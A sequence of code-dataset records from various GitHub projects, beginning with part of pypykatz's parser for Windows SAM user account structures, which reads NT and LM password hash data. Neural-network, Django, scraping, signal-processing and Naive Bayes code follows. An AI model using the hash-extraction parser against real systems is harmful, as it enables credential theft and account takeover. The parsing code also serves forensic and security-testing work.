\n\t\tuac.UserCommentLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown4 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown5 = buff.read(12) \n\t\tuac.HomeDirOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown6 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirConnectOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HomeDirConnectLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown7 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ScriptPathOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ScriptPathLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown8 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ProfilePathOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.ProfilePathLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown9 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.WorkstationsOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.WorkstationsLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown10 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HoursAllowedOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.HoursAllowedLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown11 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown12 = buff.read(12) \n\t\tuac.LMHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.LMHashLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown13 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NTHashOffset = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.NTHashLength = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown14 = int.from_bytes(buff.read(4), 'little', signed = False) \n\t\tuac.Unknown15 = buff.read(24)\n\t\tdata_offset = buff.tell()\n\t\t\n\t\tif uac.NameLength > 0:\n\t\t\tbuff.seek(data_offset +uac.NameOffset)\n\t\t\tuac.name = buff.read(uac.NameLength).decode('utf-16-le')\n\t\t\n\t\tif uac.FullNameLength > 0:\n\t\t\tbuff.seek(data_offset +uac.FullNameOffset)\n\t\t\tuac.fullname = buff.read(uac.FullNameLength).decode('utf-16-le')\n\t\tif uac.CommentLength > 0:\n\t\t\tbuff.seek(data_offset +uac.CommentOffset)\n\t\t\tuac.comment = buff.read(uac.CommentLength).decode('utf-16-le')\n\t\tif uac.UserCommentLength > 0:\n\t\t\tbuff.seek(data_offset +uac.UserCommentOffset)\n\t\t\tuac.usercomment = buff.read(uac.UserCommentLength).decode('utf-16-le')\n\t\tif uac.HomeDirLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HomeDirOffset)\n\t\t\tuac.homedir = buff.read(uac.HomeDirLength).decode('utf-16-le')\n\t\tif uac.HomeDirConnectLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HomeDirConnectOffset)\n\t\t\tuac.homedir_connect = buff.read(uac.HomeDirConnectLength).decode('utf-16-le')\n\t\t\n\t\tif uac.ScriptPathLength > 0:\n\t\t\tbuff.seek(data_offset +uac.ScriptPathOffset)\n\t\t\tuac.script_path = buff.read(uac.ScriptPathLength).decode('utf-16-le')\n\t\tif uac.ProfilePathLength > 0:\n\t\t\tbuff.seek(data_offset +uac.ProfilePathOffset)\n\t\t\tuac.profile_path = buff.read(uac.ProfilePathLength).decode('utf-16-le')\n\t\tif 
uac.WorkstationsLength > 0:\n\t\t\tbuff.seek(data_offset +uac.WorkstationsOffset)\n\t\t\tuac.workstations = buff.read(uac.WorkstationsLength).decode('utf-16-le')\n\t\tif uac.HoursAllowedLength > 0:\n\t\t\tbuff.seek(data_offset +uac.HoursAllowedOffset)\n\t\t\tuac.hoursallowed = buff.read(uac.HoursAllowedLength)\n\t\t\n\t\tif uac.NTHashLength > 0:\n\t\t\tbuff.seek(data_offset + uac.NTHashOffset + 2)\n\t\t\tif buff.read(1) == b'\\x01':\n\t\t\t\tif uac.NTHashLength == 20:\n\t\t\t\t\tbuff.seek(data_offset + uac.NTHashOffset)\n\t\t\t\t\tuac.NT_hash = SAM_HASH.from_bytes(buff.read(uac.NTHashLength))\n\t\t\t\t\n\t\t\t\tif uac.LMHashLength == 20:\n\t\t\t\t\tbuff.seek(data_offset + uac.LMHashOffset)\n\t\t\t\t\tuac.LM_hash = SAM_HASH.from_bytes(buff.read(uac.LMHashLength))\n\t\t\n\t\t\telse:\n\t\t\t\tif uac.LMHashLength == 24:\n\t\t\t\t\tbuff.seek(data_offset + uac.LMHashOffset)\n\t\t\t\t\tuac.LM_hash = SAM_HASH_AES.from_bytes(buff.read(uac.LMHashLength))\n\t\t\t\t\n\t\t\t\tbuff.seek(data_offset +uac.NTHashOffset)\n\t\t\t\tuac.NT_hash = SAM_HASH_AES.from_bytes(buff.read(uac.NTHashLength))\n\t\t\t\t\n\t\treturn uac\n\t\t\n\tdef __str__(self):\n\t\tt = '== USER_ACCOUNT_V ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\n\t\t\nclass SAM_HASH:\n\tdef __init__(self):\n\t\tself.pekID = None\n\t\tself.revision = None\n\t\tself.hash = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_HASH.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_HASH()\n\t\tsk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.revision = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.hash = buff.read(16)\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_HASH ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n\t\t\nclass SAM_HASH_AES:\n\tdef __init__(self):\n\t\tself.pekID = None\n\t\tself.revision = None\n\t\tself.data_offset = None\n\t\tself.salt = None\n\t\tself.data = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn SAM_HASH_AES.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tsk = SAM_HASH_AES()\n\t\tsk.pekID = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.revision = int.from_bytes(buff.read(2), 'little', signed = False) \n\t\tsk.data_offset = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tsk.salt = buff.read(16)\n\t\tsk.data = buff.read()\n\t\treturn sk\n\t\t\n\tdef __str__(self):\n\t\tt = '== SAM_HASH_AES ==\\r\\n'\n\t\tfor k in self.__dict__:\n\t\t\tif isinstance(self.__dict__[k], list):\n\t\t\t\tfor i, item in enumerate(self.__dict__[k]):\n\t\t\t\t\tt += ' %s: %s: %s' % (k, i, str(item))\n\t\t\telse:\n\t\t\t\tt += '%s: %s \\r\\n' % (k, str(self.__dict__[k]))\n\t\treturn t\n","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/registry/sam/structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":13487,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"28438883033","text":"from math import cos\nfrom random import 
random\n\nnumR = lambda: cos(random())\n\ndef printMat(mat, tex = ''):\n print(f'\\n {tex}')\n for m in mat: \n p = ''\n for n in m: p += f' {n} '\n print(f\"{p}\")\n\ndef validateN(n):\n try:\n n = int(n)\n return n\n except:\n print('Dato no valido')\n exit()\n\ndef addData(n, n2 = 0):\n data = []\n count = 0\n while count < n:\n data.append(n2)\n count += 1\n return data\n","repo_name":"hecdelatorre/neuralNetwork","sub_path":"functions2.py","file_name":"functions2.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17607888654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 16 10:31:29 2019\n\n@author: Arash Rahnama\n\"\"\"\nimport torch\n###############################################################################\n# Fast Gradient Sign Method\ndef fgsm(net, x, y, loss_criterion, eps):\n # compute gradient for data\n x.requires_grad = True\n preds = net(x)\n net.zero_grad()\n loss = loss_criterion(preds, y)\n loss.backward()\n x_grad = x.grad\n # get the element-wise sign of gradient\n signed_x_grad = x_grad.sign()\n # create the adversarial input\n adv_x = x + (eps*signed_x_grad)\n return adv_x\n############################################################################### \n# Projected Gradient Descent Method\ndef pgdm(net, x, y, loss_criterion, eps, steps, radius):\n # perturbations \n pgd = x.new_zeros(x.shape)\n # create the adversarial input\n adv_x = x + pgd\n for step in range(steps):\n pgd = pgd.detach()\n x = x.detach()\n # compute gradient for data\n adv_x = adv_x.clone().detach()\n adv_x.requires_grad = True\n preds = net(adv_x)\n net.zero_grad()\n loss = loss_criterion(preds, y)\n loss.backward(create_graph=False, retain_graph=False)\n adv_x_grad = adv_x.grad\n # get the element-wise sign of gradient\n signed_adv_x_grad = adv_x_grad.sign()\n # create the adversarial input\n pgd = pgd + (eps*signed_adv_x_grad)\n pgd = torch.clamp(pgd, -radius, radius)\n adv_x = x + pgd\n return adv_x\n###############################################################################\n","repo_name":"ArashRahnama/AdversarialDetection","sub_path":"adversarial/attacks.py","file_name":"attacks.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"345163245","text":"from django.contrib import admin\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\n\nfrom .models import Customer, Event, EventImage\n\n\ndef sent_invitation_email(self, request, queryset):\n \"\"\"Sending invitation email to selected customers\"\"\"\n\n for customer in queryset:\n domain = get_current_site(request).domain\n link = reverse('event_booker:confirm-booking', kwargs={'uuid_': customer.uuid})\n link = 'http://' + domain + link\n email_subject = f' {customer.event.name} booking confirmation.'\n email_send_from = 'no-reply@eventer.com'\n email_body = f'Dear {customer.name} {customer.surname},\\n \\n\\tPlease kindly confirm your attendance to an Event ' \\\n f'\"{customer.event.name}\" \\non {customer.event.date} by following the link below: \\n' \\\n f'{link} .\\n\\n' \\\n f'Kind Regards, \\n' \\\n f'Admin - EvEnter'\n\n send_mail(email_subject,\n email_body,\n email_send_from,\n [customer.email],\n fail_silently=False)\n customer.invited = True\n customer.save()\n\n\nclass 
CustomerAdmin(admin.ModelAdmin):\n    list_display = ['name', 'surname', 'email', 'event']\n    actions = [sent_invitation_email, ]\n\n\nclass EventImageInLine(admin.TabularInline):\n    model = EventImage\n\n\n@admin.register(Event)\nclass EventCustomer(admin.ModelAdmin):\n    inlines = [\n        EventImageInLine,\n    ]\n\n\nadmin.site.register(Customer, CustomerAdmin)\nadmin.site.register(EventImage)\n","repo_name":"leszekgrechowicz/Event_Booker","sub_path":"event_booker/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37181913000","text":"import torch\n\nclass FeedForwardClassifier(torch.nn.Module):\n    def __init__(self, input_size, output_size, hidden_size,\n                 num_hidden_layers, dropout_prob = None):\n        super(FeedForwardClassifier, self).__init__() \n        if dropout_prob is not None:\n            self.dropout = torch.nn.Dropout(dropout_prob)\n        else:\n            self.dropout = None\n        self.initial_layer = torch.nn.Linear(input_size, hidden_size)\n        # ModuleList (not a plain list) so the hidden layers register as sub-modules and their parameters are trained\n        self.hidden_layers = torch.nn.ModuleList(\n            [torch.nn.Linear(hidden_size, hidden_size)\n             for i in range(num_hidden_layers)])\n        self.final_layer = torch.nn.Linear(hidden_size, output_size)\n\n    def _apply_dropout(self, vec):\n        if self.dropout is not None:\n            return self.dropout(vec).float()\n        else:\n            return vec\n\n    def forward(self, input_vec, labels):\n        nextout = input_vec\n        nextout = self._apply_dropout(nextout)\n        nextout = self.initial_layer(nextout)\n        nextout = nextout.clamp(min=0)\n        for layer in self.hidden_layers:\n            nextout = self._apply_dropout(nextout)\n            nextout = layer(nextout)\n            nextout = nextout.clamp(min=0)\n        nextout = self._apply_dropout(nextout)\n        nextout = self.final_layer(nextout)\n        result = nextout\n        loss = None\n        if labels is not None:\n            loss_fct = torch.nn.CrossEntropyLoss()\n            y = torch.LongTensor(labels) \n            loss = loss_fct(result, y)\n        return result, loss\n    \n    @staticmethod\n    def create_factory_method(config):\n        assert(config['name'] == 'feedforward')\n        hidden_size = config['hiddensize']\n        num_hidden_layers = config['numlayers']\n        if 'dropout' in config:\n            dropout_prob = config['dropout']['prob']\n        else:\n            dropout_prob = None\n        return lambda x, y: FeedForwardClassifier(x, y, hidden_size, \n                                                  num_hidden_layers,\n                                                  dropout_prob)\n    \n    ","repo_name":"Mark-Hopkins-at-Williams/bigsky","sub_path":"bigsky/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41511817654","text":"import scrapy\nimport json\nfrom scrapy.crawler import CrawlerProcess\nclass CnbcSpider(scrapy.Spider):\n    name = 'cnbc'\n    allowed_domains = ['cnbc.com']\n    start_urls = ['https://www.cnbc.com/cybersecurity']\n    pagenumber=1\n    def parse(self, response):\n        div=response.xpath(\"//*[@data-test='Card']/div/div\")\n        for x in div:\n            url=x.xpath(\"./div[1]//a[contains(@class,'Card-title')]/@href\").extract_first()\n            tittle=x.xpath(\"./div[1]//a[contains(@class,'Card-title')]//text()\").extract()\n            Date=x.xpath(\"./div[2]/span/text()\").extract()\n            \n            yield response.follow(url,callback=self.parse_detail,meta={\"Url\":url,\"title\":tittle,\"Date\":Date})\n\n\n\n        next_page='https://www.cnbc.com/cybersecurity/?page='+str(CnbcSpider.pagenumber)\n\n        if CnbcSpider.pagenumber <7 :\n            # a variable named pagenumber was created on the spider class\n            # the page count starts at 1 and will run up to page 6\n            # the reason I paginate this way is that on this website the page number can grow endlessly and never raises an error.\n            \n            CnbcSpider.pagenumber += 1\n            link=response.urljoin(next_page)\n            yield scrapy.Request(url=link,callback=self.parse)\n        \n        \n        print(CnbcSpider.pagenumber)\n    def parse_detail(self,response):\n        url=response.meta.get(\"Url\")\n        title=response.meta.get(\"title\")\n        Date=response.meta.get(\"Date\")\n        # this xpath cannot get every value, because of some articles' paragraph attributes.\n        contect=response.xpath(\"//*[contains(@class,'ClipPlayer-clipPlayerIntroSummary')]//text()\").extract()\n        \n        if not contect:\n            # falsy check: contect evaluating to False here means it is an empty list. \n            # there are other ways to check whether a list is empty, such as len(contect).\n            contect=response.xpath(\"//div[contains(@class,'group')]//p/text()\").extract()\n        with open(\"cnbc.json\",\"a\",encoding=\"utf-8\")as f:\n            f.write(json.dumps({\"title\":title,\"url\":url,\"Date\":Date,\"content\":contect,\"language\":\"EN\"},indent=2,ensure_ascii=False)) \n            f.close() \nproces=CrawlerProcess()\nproces.crawl(CnbcSpider)\nproces.start() ","repo_name":"MustafaDnmez/Scrapy-ile-haber-metini-cekme","sub_path":"cybercrawl/spiders/cnbc.py","file_name":"cnbc.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5675871730","text":"from django.urls import path, include\r\nfrom rest_framework import routers\r\n\r\nfrom . import views\r\nfrom . import viewsets\r\n\r\nrouter = routers.DefaultRouter()\r\nrouter.register('users', viewsets.UserViewSet)\r\nrouter.register('alerts', viewsets.AlertViewSet, basename='alert')\r\n\r\nalert_retrieve = viewsets.AlertViewSet.as_view({\r\n    'get': 'retrieve'\r\n})\r\napp_name = 'prime'\r\nurlpatterns = [\r\n    path('', views.index, name='index'),\r\n    path('register/', views.RegisterView.as_view(), name='register'),\r\n    # Urls for web users\r\n    path('create/alert/', views.AlertCreate.as_view(), name='alerts_create'),\r\n    path('update/alert/<int:pk>/', views.AlertUpdate.as_view(), name='alerts_update'),\r\n    path('delete/alert/<int:pk>/', views.AlertDelete.as_view(), name='alerts_delete'),\r\n\r\n    path('', include((router.urls, 'alerts'), namespace='alerts'))\r\n]\r\n","repo_name":"aberrier/crypto-api-back","sub_path":"crypto/prime/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18230064073","text":"from django_extensions.db.fields import AutoSlugField\nfrom django_extensions.db.models import TimeStampedModel\nfrom django.db.models import CharField, ForeignKey, TextField, PROTECT\nfrom django.utils.translation import gettext_lazy as _\n\nfrom fields import NameMixin, VisibilityMixin\nfrom images.fields import ImageField\n\n\nclass Profile(NameMixin, TimeStampedModel, VisibilityMixin):\n    class Meta:\n        verbose_name = _(\"Actor profile\")\n        verbose_name_plural = _(\"Actor profiles\")\n\n    alias = CharField(\n        blank=True,\n        max_length=63,\n        null=True,\n        help_text=_(\"artistAliasHelpText\"),\n        verbose_name=_(\"Artist alias\"),\n    )\n    slug = AutoSlugField(_(\"Slug\"), overwrite=True, populate_from=\"name\")\n    about = TextField()\n    group = ForeignKey(\n        \"ProfileGroup\",\n        blank=True,\n        null=True,\n        on_delete=PROTECT,\n        related_name=\"profiles\",\n    )\n    avatar = ImageField(\n        blank=True, null=True, upload_to=\"var/avatars\", verbose_name=_(\"Avatar\"),\n    )\n\n    def __str__(self):\n        if 
self.alias:\n            return \"%s (%s)\" % (self.alias, self.name)\n        return super().__str__()\n","repo_name":"just-paja/polocas-napadu-api","sub_path":"profiles/models/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26268889727","text":"\"\"\"\r\nTO-DO:\r\n    4. Describe the spectrum of the AM DSB-SC signal\r\nDONE:\r\n    1. Calculate and print Fs and Ts\r\n    2. Plot the information signal, carrier signal and the AM DSB-SC signal in one plot\r\n    3. Plot the two sided and single sided spectrum of AM DSB-SC signal\r\n    5. Calculate and print the following:\r\n        1. Maximum AM DSB-SC amplitude\r\n        2. Minimum AM DSB-SC amplitude\r\n        3. Average normalized power of carrier signal\r\n        4. Average normalized power of information signal\r\n        5. Average normalized power of AM DSB-SC signal\r\n        6. Power output\r\n        7. Information signal bandwidth\r\n        8. AM DSB-SC signal bandwidth\r\n\"\"\"\r\n\r\n\r\n# Import modules to use\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom numpy import arange, cos, linspace, pi, sin, sinc, split\r\nfrom scipy.fftpack import fft, fftshift\r\n\r\n\r\nplot_colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',\r\n               '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\r\n               '#bcbd22', '#17becf']\r\n\r\n\r\ndef make_single_side_spectrum(spectrum):\r\n    return split(spectrum, 2)[-1]\r\n\r\n\r\ndef anp(signal):\r\n    return pow(signal, 2)/2\r\n\r\n\r\ndef main(scenario_number, isa, isf, csa, csf):\r\n    print(f'Scenario:\\t{scenario_number}')\r\n    isp = 1 / isf # information period\r\n    csp = 1 / csf # carrier period\r\n\r\n    max_frequency = max(csf, isf)\r\n    min_frequency = min(csf, isf)\r\n    max_period = max(csp, isp)\r\n    nyquist_frequency = 2*max_frequency\r\n    Tmax = 3*max_period\r\n\r\n    # 1. Calculate and print Fs and Ts\r\n    Fs = float(min_frequency*nyquist_frequency)\r\n    Ts = float(1/Fs)\r\n    print(f'Fs:\\t{Fs}')\r\n    print(f'Ts:\\t{Ts}')\r\n\r\n    t = linspace(0, Tmax, round(Tmax/Ts))\r\n\r\n    i_omega = 2 * pi * isf\r\n    c_omega = 2 * pi * csf\r\n\r\n    i_signal = isa * cos(i_omega * t)\r\n    c_signal = csa * cos(c_omega * t)\r\n\r\n    m = isa/csa\r\n    am_dsb_sc = i_signal*c_signal\r\n\r\n    u_band = i_signal * csa\r\n    l_band = -u_band\r\n\r\n    ts = len(t)\r\n    s_fft = fft(am_dsb_sc)\r\n    ns_fft = abs(s_fft) / ts\r\n    fs_fft = fftshift(ns_fft)\r\n    if ts % 2 == 0:\r\n        f_range = linspace(-ts/2, ts/2-1, ts)\r\n    else:\r\n        f_range = linspace(-(ts - 1)/2, (ts - 1)/2, ts)\r\n    Duration = ts*Ts\r\n    f_range *= (1 / Duration)\r\n\r\n    end_frequency_range_limit = csf + 3 * isf\r\n    end_frequency_range_ticks = int(end_frequency_range_limit/1000)\r\n\r\n    # 1. Maximum AM DSB-SC amplitude\r\n    sa_max = int(max(am_dsb_sc))\r\n    print(f'Maximum AM DSB-SC amplitude:\\t{sa_max}')\r\n\r\n    # 2. Minimum AM DSB-SC amplitude\r\n    sa_min = int(min(am_dsb_sc))\r\n    print(f'Minimum AM DSB-SC amplitude:\\t{sa_min}')\r\n\r\n    # 3. Average normalized power of carrier signal\r\n    c_anp = anp(csa)\r\n    print(f'Average normalized power of carrier signal:\\t{c_anp}')\r\n\r\n    # 4. Average normalized power of information signal\r\n    i_anp = anp(isa)\r\n    print(f'Average normalized power of information signal:\\t{i_anp}')\r\n\r\n    # 5. Average normalized power of AM DSB-SC signal\r\n    am_anp = anp(max(am_dsb_sc))\r\n    print(f'Average normalized power of AM DSB-SC signal:\\t{am_anp}')\r\n\r\n    # 6. 
Power output\r\n power_output = round(pow(m, 2) / (2 + pow(m, 2)), 1)\r\n print(f'Power output:\\t{power_output}')\r\n\r\n # 7. Information signal bandwidth\r\n i_bandwidth = isf\r\n print(f'Information signal bandwidth:\\t{i_bandwidth}')\r\n\r\n # 8. AM DSB-SC signal bandwidth\r\n s_bandwidth = 2*isf\r\n print(f'AM DSB-SC signal bandwidth:\\t{s_bandwidth}')\r\n\r\n return am_anp\r\n\r\n\r\n\"\"\"\r\n # 2. Plot the information signal, carrier signal and the AM DSB-SC signal in one plot\r\n subplot_rows, subplot_columns = 3, 1\r\n plt.figure(1)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 1)\r\n plt.plot(t, i_signal, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('Information signal')\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 2)\r\n plt.plot(t, c_signal, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('Carrier signal')\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 3)\r\n plt.plot(t, am_dsb_sc, plot_colors[0])\r\n plt.plot(t, u_band, plot_colors[1])\r\n plt.plot(t, l_band, plot_colors[2])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('AM DSB-SC w/ side bands')\r\n\r\n # 3. Plot the two sided and single sided spectrum of AM DSB-SC signal\r\n subplot_rows, subplot_columns = 2, 1\r\n plt.figure(2)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 1)\r\n plt.plot(f_range, fs_fft, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.title('Two sided spectrum')\r\n plt.xlabel('Frequency (Hz)')\r\n plt.ylabel('Amplitude (Volts)')\r\n plt.xlim([0, end_frequency_range_limit])\r\n plt.xticks([i*1000 for i in range(-end_frequency_range_ticks,\r\n end_frequency_range_ticks)], rotation=45)\r\n\r\n fs_fft = make_single_side_spectrum(fs_fft)\r\n f_range = make_single_side_spectrum(f_range)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 2)\r\n plt.plot(f_range, fs_fft, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.title('Single sided spectrum')\r\n plt.xlabel('Frequency (Hz)')\r\n plt.ylabel('Amplitude (Volts)')\r\n plt.xlim([0, end_frequency_range_limit])\r\n plt.xticks([i*1000 for i in range(0, end_frequency_range_ticks)], rotation=45)\r\n\"\"\"\r\n\r\n# with plt.xkcd():\r\n#main(1, 1, 1000, 3, 10000)\r\ncas = [5, 10]\r\ncfs = [16000, 20000, 24000]\r\nias = [2, 4, 6, 8]\r\nifs = [i*1000 for i in [4, 8, 10, 12]]\r\ncounter = 0\r\nfor ca in cas:\r\n for cf in cfs:\r\n for ia in ias:\r\n for if_ in ifs:\r\n if main(counter, ia, if_, ca, cf) == 12.5:\r\n break\r\n counter += 1\r\n\r\n\r\n# plt.show()\r\n","repo_name":"mikezamayias/glowing-sniffle","sub_path":"Past Courses/Introduction to Telecommunications/lab/Task 4/script_0.py","file_name":"script_0.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5681765478","text":"import pickle\nfrom pathlib import Path\n\n\ndef pickle_save(obj, filename, protocol=5):\n # Check if 'filename' is a path-like or a file-like object\n if hasattr(filename, \"write\"):\n # If it is a file-like object, we dump the object to it\n pickle.dump(obj, filename, protocol=protocol)\n else:\n # If it is a path-like object, we dump the object to a file, creating the folder structure, if it does not exist\n filename = Path(filename)\n filename.parent.mkdir(exist_ok=True, parents=True)\n 
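# binary mode: pickle writes a byte stream, not text\n        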
with open(filename, \"+wb\") as outfile:\n pickle.dump(obj, outfile, protocol=protocol)\n\n\ndef pickle_load(base_cls, filename):\n # Check if 'filename' is a path-like or a file-like object\n if hasattr(filename, \"read\"):\n # If it is a file-like object, we load the object from it\n restored_obj = pickle.load(filename)\n else:\n # If it is a path-like object, we load the object from a file\n with open(filename, \"+rb\") as infile:\n restored_obj = pickle.load(infile)\n assert type(restored_obj) == base_cls\n return restored_obj\n","repo_name":"CSML-IIT-UCL/kooplearn","sub_path":"kooplearn/_src/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"17430015030","text":"def reverse(x):\r\n z = x[::-1]\r\n\r\n return z\r\n\r\ndef twist(x):\r\n z=[]\r\n j = reverse(x)\r\n\r\n for i in j:\r\n if type(i) == list:\r\n i = reverse(i)\r\n z.append(i)\r\n\r\n return z\r\n\r\nI = []\r\nprint(\"Instruction:\\n 1.Type \\\"1\\\" to add a top level element\\n 2.Type \\\"2\\\" to add a 2nd level element\\n 3.Type \\\"done\\\" to finish insertion\")\r\nwhile True:\r\n a = input()\r\n\r\n if a == \"1\":\r\n top = input(\"add one top level element:\")\r\n top = top.split(\" \")\r\n for i in top:\r\n I.append(i)\r\n print(I)\r\n\r\n elif a == \"2\":\r\n second = input(\"add one 2nd level element:\")\r\n second = second.split(\" \")\r\n I.append(second)\r\n print(I)\r\n\r\n elif a == \"done\":\r\n break\r\n\r\n else:\r\n print(\"please follow the instruction\")\r\n\r\n\r\nprint(\"reverse %s -->\" %I, reverse(I))\r\nprint(\"twist %s -->\" %I, twist(I))","repo_name":"Jiyoonki/Assignments","sub_path":"PrinciplesProgrammingLanguage/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"362758581","text":"# _*_ coding = utf-8 _*_\n# @Date : 2021/12/27\n# @Time : 19:23\n# @NAME :molin\n'''\n 使用朴素贝叶斯对电子邮件进行分类的步骤:\n\n 收集数据:提供文本文件。\n 准备数据:将文本文件解析成词条向量。\n 分析数据:检查词条确保解析的正确性。\n 训练算法:使用我们之前建立的trainNB0()函数。\n 测试算法:使用classifyNB(),并构建一个新的测试函数来计算文档集的错误率。\n 使用算法:构建一个完整的程序对一组文档进行分类,将错分的文档输出到屏幕上。\n ————————————————\n 版权声明:本文为CSDN博主“Jack-Cui”的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。\n 原文链接:https://blog.csdn.net/c406495762/article/details/77500679\n'''\n\n# 准备数据\nimport re\nimport numpy as np\nimport random\n\n\"\"\"\n函数说明:接收一个大字符串并将其解析为字符串列表\n\nParameters:\n 无\nReturns:\n 无\nAuthor:\n Jack Cui\nBlog:\n http://blog.csdn.net/c406495762\nModify:\n 2017-08-14\n\"\"\"\ndef textParse(bigString):\n # * 会匹配0个或多个规则,split会将字符串分割成单个字符【python3.5+】; 这里使用\\W 或者\\W+ 都可以将字符数字串分割开,产生的空字符将会在后面的列表推导式中过滤掉\n listOfTokens = re.split(r'\\W+', bigString)\n # 将特殊符号作为切分标志进行字符串切分,即非字母、非数字\n return [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\n# 函数说明:将切分的实验样本词条整理成不重复的词条列表,也就是词汇表\ndef createVocabList(dataSet):\n # 创建一个空的不重复列表\n vocabSet = set([])\n for document in dataSet:\n # 